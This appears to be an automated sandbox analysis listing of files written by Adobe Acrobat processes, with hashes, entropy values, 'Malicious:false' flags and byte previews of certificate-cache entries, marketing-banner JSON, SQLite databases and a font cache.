                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):192
                                                                        Entropy (8bit):2.7569015731729736
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:87A98235775BA628110AAA7494A95EA9
                                                                        SHA1:61A21603FB73B591A2D82BE0375C5867E421045C
                                                                        SHA-256:81FA26415888286D1C136C06D630BEE0303F5325D9B7DCED9111059D6912E049
                                                                        SHA-512:6DA5C3FB25DF1E2CF99821B61960C903D17E83C361D8D41182D2EE7F9CB3B21BBA983CF69FACB220780483D986BFCDFEA0007AB6AAEC5D5D680CCAB8F2E99762
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:p...... ........@..7.K..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):328
                                                                        Entropy (8bit):3.1379890379152853
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4B4CC02CA690994600D1C1CD9504AB58
                                                                        SHA1:1FE446646720A8F7959A716EC3FA1A0A990DF8EA
                                                                        SHA-256:9A9660604C717A7699F586CD80EBFFA481C7132B98E1E3293D2253AD035D901E
                                                                        SHA-512:E5105652553F61E2168E3970639F7168FD3A91CD6CFF6C7E6FE5EE8E93177131AEDB3A3CE66FDF107B12B03CC15E096641661DB918AD0677014F8E97C3E17513
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:p...... ...........K.K..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):295
                                                                        Entropy (8bit):5.378255082751442
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:06FA5A3ED39D7B7BA56F7A6C70F644F5
                                                                        SHA1:0A1057F4B84CCCFDA9A578B5F8F367644A37E774
                                                                        SHA-256:2AAB791F0798830A982D617B2BF4A6D8541CD8DD47A2B8AC1B9115F4472E465E
                                                                        SHA-512:C18CC8E9DEA9E0D723BF8E3BC02C57A795B18BD30067208901715EC052C262B89819A2356F0B50AB3E8685DD13C54AD938F05D646F6AE85FC82A353FC0E06CDE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):294
                                                                        Entropy (8bit):5.327236024593732
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9223880FE2A87C72B7E08EA3AEC7B10C
                                                                        SHA1:D51D7FF708A5EE5C42A6827D85214A3097F0A4BA
                                                                        SHA-256:884FA5EB55FFE0D5A9DA80244E17DEF60BFF2A3F32710AC48EDCA8E5E025A99E
                                                                        SHA-512:FF8E65A5564C0EFF2A99DBDE21BB7F9E0FD254F8448945BCDF3A59F093E5380B75AAECCB3E779E3518235F0C2557D0937A74CEDE07B15A14124D8A24A9BEF831
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):294
                                                                        Entropy (8bit):5.3064337725629365
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0C37FA686615D866A178872A0AFC5008
                                                                        SHA1:ACD7C7B0EC723286DCF16ED2FB997453A316078A
                                                                        SHA-256:D29FF509FA73586CF21B4B130CBB3F09FB8C68AAAFB6BF7B902C2CB34D451322
                                                                        SHA-512:F44FB4B230A0565F8D584FF50CEEA893DA3D68DDE45954E9FDAA4A165ABD6D92D2A63732065939277DA30CF45B3AA60F309C31C1C801F9C178FEADAC5D1F867C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):285
                                                                        Entropy (8bit):5.367157787156797
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E9C2287300B4008E7381329F23559C72
                                                                        SHA1:7BE283F3167B48BC73F991D4E3CE63A1559A79A1
                                                                        SHA-256:A792CDCEFB3D74C2564A458E7B538BD4D3C45E3138FEF460A665F5C9B621A744
                                                                        SHA-512:C490DEF485247B56638C6151AC3BF3C70B9CA3915C9930D943D8458C9D7695CCB95B0D738ACC597C21A23C85C7500FEAEA4E971913A3E3CFB43437EF382DE6AF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1123
                                                                        Entropy (8bit):5.692398067198556
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:69889D15ED63D4B15DDDBD8BDFAEA758
                                                                        SHA1:37712BDAB81BDA936CBD58B1DCC516B7804F0917
                                                                        SHA-256:2DA68B00EAB9FD6A3F092EE662EA0C042334028A3DA974E878FED2C5FB12983B
                                                                        SHA-512:2AE0EDE09797D17F02F38E5F80BD276F773341888CBBF19C5CE8F6D4667C95D293B41247E89FA5E5F276FCA443B668730B349D5C6F893AC7CE3537F032DA2C70
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.315992185185739
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7E6D21843DD384164EE0B61B89156C78
                                                                        SHA1:529023CCE81F483669E163990A9B2F4F78275856
                                                                        SHA-256:39B901353DEF949C67D34F36D443F463C7CD6FECC7FA98488015817A5C97DB02
                                                                        SHA-512:4120B2F32DE22748098B86296A5762F71A9A4798DB2B1D7E152BC6130C32FF078CECE95B4E26322248E9895963447365FB52550AAA0F59C628DB57A1D98E304A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):292
                                                                        Entropy (8bit):5.318770933451487
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:62F2BCBE5086FF48A8068EB8D47A23A3
                                                                        SHA1:4D017784986973F51D1126BBA4D40990CA98EBDB
                                                                        SHA-256:896F6C6DA90D8E6BD2A3F1EA3CFD8A9BA16C6652488DB0A6DB000C4EC73FFB87
                                                                        SHA-512:48F559199E788D6FEF5BB2232F11CB06B5A6FBD7EEF749DFA44865D2A6CB26168B3A68B400ECC4F0923764C7DF57092C67ECCAE4A1347B16128D5D15DB79FBAD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.324239415114582
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7C59956243787C715CCAE1A62685089D
                                                                        SHA1:DFA3FE9CF4D7DCE519379C446F440EE37100710D
                                                                        SHA-256:18F6CB5AD22C91F6543483A6F59DCEC3E4BCD5E5433AD70DCAE4F27E264C3A5B
                                                                        SHA-512:38C0AD8BAEEAE492792D6489CAC472CA66DD48029C610A96DA8CB90B73939A4CD8014CAA6ED658BCF9B9DEE417E85396F8AA7EEC050176F9A150F7657E0450E1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):295
                                                                        Entropy (8bit):5.34043952520487
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E6FCEB2AECC5449BD7FE2680DB2A4908
                                                                        SHA1:D4C20B1EF1B1E8DDAA4D626C8B7D9B774EE5002F
                                                                        SHA-256:20E357E1D334314E1CFC07F520999DBD6B554C8996279C0D9D3B4632534E189F
                                                                        SHA-512:51A3755D52FCA688F4963E70D7B2B52CF2B1EAF3C9EA350C1D92F24655E2CC8583DC724096A3AC10C90699D7558B95609016D74F4C4E67D1CE776264C0AE0EF0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.321520830005263
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CD9CA155A748A0434397123D336F0677
                                                                        SHA1:B51362F11663E90EE0966750363690802FF41C77
                                                                        SHA-256:7E859FF87BCCB2DD5700F9120C7D9A494475C7FD4E199C4D86CC4D6333D854B5
                                                                        SHA-512:CB967222335A1B9BD524011A0F4A3A970511D264DBDEC9C81781A2DACC52D8299527EB6C00F7A5788379CBC7037BA3FD107833907327E08AA7957A5A63A1155C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):284
                                                                        Entropy (8bit):5.307950090680342
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6EA7397463F6AECD8996D514AE60DB05
                                                                        SHA1:4A91332A083FE9C651CA1442E903BF8F52E29FBB
                                                                        SHA-256:DA7CEF9BE3B36F19FC0F8F89D6AD129CCAD482320056D6807A5F7762A851DCC3
                                                                        SHA-512:6716264DE32721594CC22D75E55D3927FC6CCE8B238689B8C8E8127EE08084D38857DFCAA393DA277581EB23702B55FD3FC57ED67C018F5CDA58F944ACC5A867
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):291
                                                                        Entropy (8bit):5.304920018194554
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:04660BFA88166DEB0FBE5351FCBD9474
                                                                        SHA1:6E5BA5D27B9D79BFDC9717D3CBBCD6AB9A50D700
                                                                        SHA-256:46EBFBDC7E64E932E999EA80D02415615CB0939A4D048FEFF17C81EDB7077FAA
                                                                        SHA-512:E3F34928208ED219E7D5AC7234BD9D00DD7809A732803DBB97476A192188ABF4121E32E40C2CD0766698271814720C31D359FBD014ED53F50E6244055DAF5401
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):287
                                                                        Entropy (8bit):5.308599218933505
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:129B300B19432A8B3A2BDD05F8CEB33C
                                                                        SHA1:DE37ECC1CE6ECBB2D6DC813911181BBF278D4A6D
                                                                        SHA-256:ED4FBA81B40ACBD513DCE1E3D3588F2F564BC1763C2F911B25E5715EE1E17CFE
                                                                        SHA-512:2A22B7B26D13EB90EC2364973F0D566FE51CCD5DE4CED608076BBA5F74B0036FA2D0CD9DF3ED7AC2293EA8DA2E259DABEA7748B179A502974E94BA52AD8D2B81
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1090
                                                                        Entropy (8bit):5.667657089031991
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:566A087C61E06C8CF3C6CD79192F7B38
                                                                        SHA1:11150922F2C0320A15B825908A82D4503C23FFD2
                                                                        SHA-256:BC60AEEE8120E8725A4043C72BC0BAE2EC29DE7E20C634CA2B523BA454C0D385
                                                                        SHA-512:D0F31DEE0877567C55476DCD038C22F2EBDF2F591E370805BE33442614F7E7A13450914B10601D9936E02403AC26B10C7373B7271EBEBE84F89A872627EDE1BE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):286
                                                                        Entropy (8bit):5.284014995841211
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0FAA9DF461BB8C0FE7A456EEA70BFA21
                                                                        SHA1:5696099039ABFA8087FA082BFE0BA1655D77805C
                                                                        SHA-256:38FB1ADF734834E4E116D43E3D151E995FDD6F84A96A8BA24098178E70C1D780
                                                                        SHA-512:D166EB0AAB7A12E56A0241E68E4DC3D5A9B06EE82FAE6882444770C03F86DAA1C6BA69AF1C4255CBE8F48E3222E0D2A42BA9B0FAB9B16A2F56806990C15C2DB9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):282
                                                                        Entropy (8bit):5.295562449669952
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D29353F31CBCA28E81ED1134666F0474
                                                                        SHA1:4AF107E266F01BEF93430478429825E290FF5D12
                                                                        SHA-256:EC87546812693AD75540DA3C64FCEDA2CB9D47D6F92329C96329C54C6755CC94
                                                                        SHA-512:3093783C398C2E7EB0F4CFA785D83BC8372701C3DA74838A9B19868960BD8A91AB38390C2B83675AA26926B0E5984C4C59B949705A7F78FCA0432CA75530DE60
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"analyticsData":{"responseGUID":"06f23f0a-17d6-455d-a151-f0b50e7593b8","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734114884764,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4
                                                                        Entropy (8bit):0.8112781244591328
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:....
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):2814
                                                                        Entropy (8bit):5.122633990453143
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F96B2938DA8AB979D7B0B5EAA35E386E
                                                                        SHA1:2EDC4AE4759EB15CD55E6752942EF192F6D76B1B
                                                                        SHA-256:112E1FBCE94B30E16509FE87C27A383B646D03D23519C1B4BAE92E71262F0C58
                                                                        SHA-512:134708620BFFD0BAD74A4ABA79EE3F82FC0C8EC992521484FCC994054E128632FAAB3C90910BDB5C45DCACEE198D9CEC477142B3CC64A56295254E3D2B5AA058
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"0a99eaa6fd80e96a86a219b6dd4a26fd","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1733940734000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"79bd9007c6a54fbe4c2e25c33cfe26db","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1733940734000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"75f098068f6fcc732a6fab7787140fe5","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1733940734000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"46bfccdd0ee2c2630c5cf5de84fd34b9","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1733940734000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"a7f60231822fa99ed375c0610922c9e8","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1733940734000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"7661f047483703e38fd4983d4c5284e0","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                        Category:dropped
                                                                        Size (bytes):12288
                                                                        Entropy (8bit):0.9881981279575871
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:54B3690D906A6AB7D5735D421FDB7A0A
                                                                        SHA1:5880995E063B7F94F75C835CFE6E05C0EA8A1C70
                                                                        SHA-256:9D5174AB3E6AE1F88E95D2D8BEDAF24E3C8D7AF30C6FCF0678B026D4CC19C000
                                                                        SHA-512:3107BD074CBE137ACDFCEBD67D831B1D654078C1373C81ABF0523C60A75F8775EE7AECFE18A2548281C9B09DED86022541341C8EB5C5B0D8DBA9A8748825D728
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite Rollback Journal
                                                                        Category:dropped
                                                                        Size (bytes):8720
                                                                        Entropy (8bit):1.3427423257541624
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:953010B9A0965BBBEC33237C931EF857
                                                                        SHA1:51A064CE60AA8996494CB607AA48CA2593FC1A12
                                                                        SHA-256:1805435F657D0B245FF57AB67E9757B87C4BACA3159B5C12AF84104348D56D35
                                                                        SHA-512:DEC7CE054EF99538C7E65CCA76CC9F69DA9D3CC2B3D9B212E96B40D1C8D947582700D496137402F0DA49E43EB555D7640A709644EFF6ABFD6B07C400F9DB0F48
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.... .c.....b.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):66726
                                                                        Entropy (8bit):5.392739213842091
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5C82A2022F11E204419BAA91A5DF1AA2
                                                                        SHA1:609641868717225899384065281D46ACE3CEF39B
                                                                        SHA-256:5367C367D179382D67963469C2A319E3F7A8E745266BCAA0D90D3C6B5AB53A9A
                                                                        SHA-512:B9A7CF086541A9C24ADA8D35B3E536B841F7451B9A87444CE7B373819D67984E16301FE9FB1CD50BE7B63DB4B6417D78DDB88E55ACC62776DE239DCBC0027CA2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):246
                                                                        Entropy (8bit):3.4709625315637744
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:354A0E98168F72B653CB4CA07CAE23A9
                                                                        SHA1:71158E47C07750753624297E59B987504815DBE9
                                                                        SHA-256:58E9B77D77E74990F38CBB88B522D3925AE92F67DAB86DD20871E24A18E3FA95
                                                                        SHA-512:D9532D2DC32357F022EF062F2F63F8F6D6F45AE5B366ED3EC4F27A1D565D3FD280A7A6EB5DC90E8A0C379A93B87AA061E88405C7B049FDAA164E08DFBE04B2FB
                                                                        Malicious:false
                                                                        Reputation:unknown
